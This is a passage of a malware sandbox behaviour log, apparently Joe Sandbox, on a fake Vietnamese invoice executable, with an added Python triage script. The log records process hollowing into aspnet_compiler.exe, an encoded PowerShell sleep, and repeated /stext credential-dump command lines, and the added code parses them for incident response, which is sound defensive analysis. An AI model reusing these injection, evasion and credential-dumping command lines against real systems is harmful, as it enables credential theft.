Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Section loaded: unknown target: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe protection: execute and read and write
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Section loaded: unknown target: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe protection: execute and read and write
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Section loaded: unknown target: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe protection: execute and read and write
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Section loaded: unknown target: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe protection: execute and read and write
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Section loaded: unknown target: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe protection: execute and read and write
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Section loaded: unknown target: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe protection: execute and read and write
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Section loaded: unknown target: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe protection: execute and read and write
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Section loaded: unknown target: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe protection: execute and read and write
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Section loaded: unknown target: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe protection: execute and read and write
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Section loaded: unknown target: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe protection: execute and read and write
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Section loaded: unknown target: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe protection: execute and read and write
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Section loaded: unknown target: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe protection: execute and read and write
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Section loaded: unknown target: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe protection: execute and read and write
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Section loaded: unknown target: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe protection: execute and read and write
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Section loaded: unknown target: unknown protection: execute and read and write
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Section loaded: unknown target: unknown protection: execute and read and write
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Section loaded: unknown target: unknown protection: execute and read and write
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Section loaded: unknown target: unknown protection: execute and read and write
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Section loaded: unknown target: unknown protection: execute and read and write
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe Process created: Base64 decoded start-sleep -seconds 20
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe Process created: Base64 decoded start-sleep -seconds 20 Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: 400000 value starts with: 4D5A Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Section unmapped: unknown base address: 400000 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Section unmapped: unknown base address: 400000 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Section unmapped: unknown base address: 400000 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Section unmapped: unknown base address: 400000 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Section unmapped: unknown base address: 400000 Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: 400000 Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: 401000 Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: 456000 Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: 46E000 Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: 474000 Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: 475000 Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: 476000 Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: 47B000 Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: F55008 Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ENC cwB0AGEAcgB0AC0AcwBsAGUAZQBwACAALQBzAGUAYwBvAG4AZABzACAAMgAwAA==
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe /stext "C:\Users\user\AppData\Local\Temp\jzlrsem"
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe /stext "C:\Users\user\AppData\Local\Temp\jzlrsem"
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe /stext "C:\Users\user\AppData\Local\Temp\ubrkswxpfz"
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe /stext "C:\Users\user\AppData\Local\Temp\evectoiqthdfs"
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Process created: C:\Users\user\AppData\Local\Temp\dwn.exe "C:\Users\user\AppData\Local\Temp\dwn.exe"
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe /stext "C:\Users\user\AppData\Local\Temp\ixjslbemgsufoiuudk"
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe /stext "C:\Users\user\AppData\Local\Temp\tzolmupfuamrqwiynvqal"
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe /stext "C:\Users\user\AppData\Local\Temp\tzolmupfuamrqwiynvqal"
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe /stext "C:\Users\user\AppData\Local\Temp\dttwnmhhiiewacecwgdtoztjz"
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe /stext "C:\Users\user\AppData\Local\Temp\dttwnmhhiiewacecwgdtoztjz"
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe /stext "C:\Users\user\AppData\Local\Temp\dttwnmhhiiewacecwgdtoztjz"
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe /stext "C:\Users\user\AppData\Local\Temp\dttwnmhhiiewacecwgdtoztjz"
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe /stext "C:\Users\user\AppData\Local\Temp\dttwnmhhiiewacecwgdtoztjz"
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe /stext "C:\Users\user\AppData\Local\Temp\dttwnmhhiiewacecwgdtoztjz"
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe /stext "C:\Users\user\AppData\Local\Temp\xbsbmhljhlcrmkvfybyknsbrlg"
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe /stext "C:\Users\user\AppData\Local\Temp\ivyunzdcvtueoyrjhmkmqwoatvkpua"
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe /stext "C:\Users\user\AppData\Local\Temp\sxdnnkoerbmjyegnzxxfbjirubcqnlslo"
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe /stext "C:\Users\user\AppData\Local\Temp\sxdnnkoerbmjyegnzxxfbjirubcqnlslo"
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe /stext "C:\Users\user\AppData\Local\Temp\xzhdfxk"
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe /stext "C:\Users\user\AppData\Local\Temp\huvvgpvbsu"
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe /stext "C:\Users\user\AppData\Local\Temp\jwaohifvgcnaz"
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe /stext "C:\Users\user\AppData\Local\Temp\jwaohifvgcnaz"
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe /stext "C:\Users\user\AppData\Local\Temp\bbmbgkgdsftq"
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe /stext "C:\Users\user\AppData\Local\Temp\mvrmgcrxgnlvkuc"
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe /stext "C:\Users\user\AppData\Local\Temp\wyeehvbyuvdiuiytom"
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe /stext "C:\Users\user\AppData\Local\Temp\odqrgxczfqkyvjblz"
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Process created: unknown unknown
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Process created: unknown unknown
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Process created: unknown unknown
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Process created: unknown unknown
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Process created: unknown unknown
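Added example (this is triage code written for this page, not part of the Joe Sandbox report and not code from the sample or from any vendor tool): a Python script that reads the "Memory written" and "Process created" entries above and pulls out the three things a responder wants from them. It pairs each image that the sample wrote into with a launch of that same image by the same source (the pattern the report labels process hollowing / PE injection into a foreign process), decodes the argument powershell.exe received through -ENC (base64 over UTF-16LE, which here is a plain 20-second start-sleep that matches the report's sleep-based evasion signatures), and lists every case in which aspnet_compiler.exe relaunched its own image with NirSoft's /stext <file> switch, the switch that writes a recovered-credential list to the named file; those %TEMP% paths are the artefacts to collect from the host. The input is a constructed sample of the report's own lines copied verbatim, "Jump to behavior" link labels included, with the sandbox's "#Uxxxx" filename encoding left untouched; the function and field names (clean, triage, hollow_candidates, stext_dumps) are this example's own. The font-file VolumeInformation queries further down are consistent with GDI+ enumerating installed fonts on behalf of a System.Drawing/WinForms binary and are deliberately not treated as an indicator here.

```python
"""Added triage helper for the sandbox log lines above (example code, not part of the report)."""
import base64
import re
from collections import Counter

# Image paths exactly as the report prints them. "#Uxxxx" is the sandbox's own
# encoding of the non-ASCII characters in the sample name and is left as-is.
SAMPLE = r"C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe"
ASPNET = r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
POSH = r"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"

# Constructed input: a handful of the report's own lines, copied verbatim.
REPORT_LINES = [
    rf"Source: {SAMPLE} Memory written: {ASPNET} base: 401000 Jump to behavior",
    rf"Source: {SAMPLE} Memory written: {ASPNET} base: F55008 Jump to behavior",
    rf'Source: {SAMPLE} Process created: {POSH} "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" '
    r"-ENC cwB0AGEAcgB0AC0AcwBsAGUAZQBwACAALQBzAGUAYwBvAG4AZABzACAAMgAwAA== Jump to behavior",
    rf"Source: {SAMPLE} Process created: {ASPNET} {ASPNET} Jump to behavior",
    rf'Source: {ASPNET} Process created: {ASPNET} {ASPNET} /stext "C:\Users\user\AppData\Local\Temp\jzlrsem" Jump to behavior',
    rf'Source: {ASPNET} Process created: {ASPNET} {ASPNET} /stext "C:\Users\user\AppData\Local\Temp\jzlrsem" Jump to behavior',
    rf'Source: {ASPNET} Process created: C:\Users\user\AppData\Local\Temp\dwn.exe "C:\Users\user\AppData\Local\Temp\dwn.exe" Jump to behavior',
    rf"Source: {ASPNET} Process created: unknown unknown Jump to behavior",
]

_MEMWRITE_RE = re.compile(r"^Source: (?P<src>.+?) Memory written: (?P<target>\S+) base: (?P<base>[0-9A-Fa-f]+)$")
_PROC_RE = re.compile(r"^Source: (?P<parent>.+?) Process created: (?P<child>\S+) ?(?P<cmdline>.*)$")
# powershell.exe takes -e, -ec and any unambiguous prefix of -EncodedCommand.
_ENC_FLAGS = ["ec"] + ["encodedcommand"[:i] for i in range(1, 15)]
_ENC_RE = re.compile(r"(?:^|\s)-(?:" + "|".join(_ENC_FLAGS) + r")\s+([A-Za-z0-9+/=]+)", re.I)
# NirSoft command-line switch: save the recovered list as a plain-text file.
_STEXT_RE = re.compile(r'/stext\s+"([^"]+)"', re.I)


def clean(line: str) -> str:
    """Drop the 'Jump to behavior' link label that the HTML export leaves on every line."""
    return re.sub(r"\s*Jump to behavior\s*$", "", line.strip())


def decode_encoded_command(cmdline: str):
    """Return the plaintext behind a -EncodedCommand argument, or None.

    The payload is base64 over UTF-16LE, so decoding it as UTF-8 gives
    NUL-interleaved garbage. Strict base64 validation turns a non-base64
    token after a matching switch into None instead of an exception.
    """
    m = _ENC_RE.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def parse_events(lines):
    """Split the log into (src, target, base) memory writes and (parent, child, cmdline) launches."""
    writes, procs = [], []
    for raw in lines:
        line = clean(raw)
        m = _MEMWRITE_RE.match(line)
        if m:
            writes.append((m["src"], m["target"], int(m["base"], 16)))
            continue
        m = _PROC_RE.match(line)
        if m:
            procs.append((m["parent"], m["child"], m["cmdline"]))
    return writes, procs


def triage(lines):
    """Summarise the injection, encoded-command and credential-dump indicators."""
    writes, procs = parse_events(lines)
    written_by = {(src, target) for src, target, _ in writes}
    # An image that one source both wrote into and launched: the foreign-process
    # write plus launch that the report reports as process hollowing.
    hollow_candidates = sorted({child for parent, child, _ in procs if (parent, child) in written_by})
    decoded, dumps = [], []
    for parent, child, cmdline in procs:
        plain = decode_encoded_command(cmdline)
        if plain is not None:
            decoded.append(plain)
        m = _STEXT_RE.search(cmdline)
        # A process relaunching its own image with /stext <file> is the injected
        # NirSoft recovery tool writing its credential list to that file.
        if m and parent == child and m.group(1) not in dumps:
            dumps.append(m.group(1))
    return {
        "hollow_candidates": hollow_candidates,
        "decoded_powershell": decoded,
        "stext_dumps": dumps,
        "self_spawn_counts": dict(Counter(c for p, c, _ in procs if p == c)),
        "unresolved_children": sum(1 for _, c, _ in procs if c == "unknown"),
    }


if __name__ == "__main__":
    for key, value in triage(REPORT_LINES).items():
        print(f"{key}: {value}")
```

Run it against the full report by replacing REPORT_LINES with the exported lines; the stext_dumps list then holds every /stext target in the process list above, and decoded_powershell shows why the -ENC argument is harmless on its own (a sleep) even though an encoded command line is a good hunting pivot.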
Source: aspnet_compiler.exe, 0000000C.00000002.533978601.0000000004032000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Program ManagerF
Source: aspnet_compiler.exe, 0000000C.00000002.533978601.0000000004032000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Program Manager
Source: aspnet_compiler.exe, 0000000C.00000002.534251158.000000000403F000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 0000000C.00000002.534069193.0000000004037000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 0000000C.00000003.477736669.0000000004001000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: |Program Manager|
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe Queries volume information: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe VolumeInformation
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe Queries volume information: C:\Windows\Fonts\arial.ttf VolumeInformation
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe Queries volume information: C:\Windows\Fonts\ariali.ttf VolumeInformation
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe Queries volume information: C:\Windows\Fonts\arialbd.ttf VolumeInformation
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe Queries volume information: C:\Windows\Fonts\arialbi.ttf VolumeInformation
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe Queries volume information: C:\Windows\Fonts\ARIALN.TTF VolumeInformation
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe Queries volume information: C:\Windows\Fonts\ariblk.ttf VolumeInformation
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe Queries volume information: C:\Windows\Fonts\ARIALNI.TTF VolumeInformation
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe Queries volume information: C:\Windows\Fonts\ARIALNB.TTF VolumeInformation
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe Queries volume information: C:\Windows\Fonts\ARIALNBI.TTF VolumeInformation
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe Queries volume information: C:\Windows\Fonts\calibri.ttf VolumeInformation
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe Queries volume information: C:\Windows\Fonts\calibril.ttf VolumeInformation
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe Queries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformation
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe Queries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformation
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe Queries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformation
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe Queries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformation
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe Queries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe Queries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformation
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe Queries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformation
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe Queries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformation
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe Queries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformation
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe Queries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformation
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe Queries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformation
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe Queries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformation
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe Queries volume information: C:\Windows\Fonts\comic.ttf VolumeInformation
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe Queries volume information: C:\Windows\Fonts\comici.ttf VolumeInformation
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe Queries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformation
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe Queries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformation
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe Queries volume information: C:\Windows\Fonts\consola.ttf VolumeInformation
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe Queries volume information: C:\Windows\Fonts\consolai.ttf VolumeInformation
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe Queries volume information: C:\Windows\Fonts\consolab.ttf VolumeInformation
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe Queries volume information: C:\Windows\Fonts\consolaz.ttf VolumeInformation
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe Queries volume information: C:\Windows\Fonts\constan.ttf VolumeInformation
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe Queries volume information: C:\Windows\Fonts\constani.ttf VolumeInformation
